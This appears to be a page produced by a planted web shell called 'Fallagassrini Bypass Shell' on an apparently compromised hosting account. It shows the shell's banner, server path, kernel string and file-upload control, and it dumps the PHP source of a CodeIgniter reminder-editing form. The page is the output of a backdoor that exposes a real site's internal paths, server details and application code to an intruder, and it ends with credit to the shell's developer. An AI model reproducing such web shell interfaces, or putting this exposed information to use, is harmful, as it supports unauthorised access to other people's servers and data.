? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/busybees/application/views/settings/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/busybees/application/views/settings/edit_reminder.php

<?php 
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
    $this->load->view('documentreadyfunctions');          
 ?>  
<div class="icons_main">
    <div  class="icons">
        <img src="<?=base_url()?>assets/images/back.png" title="Back" class="clickimage" onclick="viewdata('settings','viewinsettingssearch','search_reminder','view_reminder','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="32" height="32"  />
    </div>
    <div class="icons_caption">
        <h4>Updating Reminder</h4>
    </div>
</div>
<?php
$attributes=array('id'=>'validateform','class'=>'validate');
        echo form_open('settings/addinsettings/update_reminder/view_reminder/1',$attributes);     
?>
<div class="grid_6">
    <div class="box">
         <div class="header">
            <span></span>
         </div>
         
            <div class="content no-padding">
                <div class="section _100">
                    <label>Subject </label>
                    <div>
                            <input name="reminder_subject" id="reminder_subject" class="required" type="text" value="<?=$viewinfo->reminder_subject?>">
                    </div>
                </div>                
                 <div class="section _100">
                    <label> Reminder Date </label>
                    <div>
                            <input name="reminder_date" id="date" type="dateonly" class="required" value="<?=$this->mastermodel->convertdatenormalformat($viewinfo->reminder_date)?>"/>
                    </div>
                 </div>
                 <div class="section _100">
                    <label> Remind Before </label>
                    <div>
                            <input name="remind_before" id="remind_before" class="mail" type="text" value="<?=$viewinfo->remind_before?>">
                    </div>
                </div>     
                <div class="section _100">
                    <label> Description </label>
                    <div>
                            <textarea name="reminder_description" id="reminder_description" class="mail"  ><?=$viewinfo->reminder_description?></textarea>
                    </div>
                </div>
               


            </div>
             <div class="actions"> 
                 <div class="actions-left">
                            <input type="reset">
                            <input type="hidden" name="resfunction" value="search_agent"/>
                            <input type="hidden" name="reminder_id" value="<?=$viewinfo->reminder_id?>"/> 
                    </div>           
                    <div class="actions-right">
                            <button type="submit" id="submit" class="clickimage" onclick="addformdata('validateform')">Update</button>
                    </div>
            </div>
        <?php echo form_close();?>
    </div> 
</div> 





bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net